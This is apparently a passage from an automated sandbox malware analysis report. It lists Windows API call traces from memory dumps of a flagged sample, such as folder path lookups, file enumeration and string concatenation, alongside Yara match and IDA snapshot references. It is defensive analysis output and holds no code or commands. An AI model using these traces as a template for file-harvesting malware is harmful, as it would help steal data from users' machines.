                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: SystemTimelstrcpy
                                                            • String ID: cI@$cI@
                                                            • API String ID: 62757014-1697673767
                                                            APIs
                                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                                            • lstrcatA.KERNEL32(?,0087A6F8), ref: 004150A8
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                              • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                            • String ID: aA
                                                            • API String ID: 2699682494-2567749500
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022DA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022DA094
                                                            • lstrlen.KERNEL32(00000000), ref: 022DBF06
                                                              • Part of subcall function 022E9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022E90B9
                                                            • StrStrA.SHLWAPI(00000000,004213E0), ref: 022DBF34
                                                            • lstrlen.KERNEL32(00000000), ref: 022DC00C
                                                            • lstrlen.KERNEL32(00000000), ref: 022DC020
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                            • String ID:
                                                            • API String ID: 1440504306-0
                                                            APIs
                                                            • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                            • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                            • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                            • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$CloseFileNextlstrcat
                                                            • String ID: !=A
                                                            • API String ID: 3840410801-2919091325
                                                            APIs
                                                              • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E51E1
                                                            • lstrcat.KERNEL32(?,00421070), ref: 022E51FE
                                                            • lstrcat.KERNEL32(?,0064A5F8), ref: 022E5212
                                                            • lstrcat.KERNEL32(?,00421074), ref: 022E5224
                                                              • Part of subcall function 022E4B77: wsprintfA.USER32 ref: 022E4B93
                                                              • Part of subcall function 022E4B77: FindFirstFileA.KERNEL32(?,?), ref: 022E4BAA
                                                              • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022E4BD8
                                                              • Part of subcall function 022E4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022E4BEE
                                                              • Part of subcall function 022E4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022E4DE4
                                                              • Part of subcall function 022E4B77: FindClose.KERNEL32(000000FF), ref: 022E4DF9
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                            • String ID:
                                                            • API String ID: 2667927680-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpynlstrlenwsprintf
                                                            • String ID:
                                                            • API String ID: 1206339513-0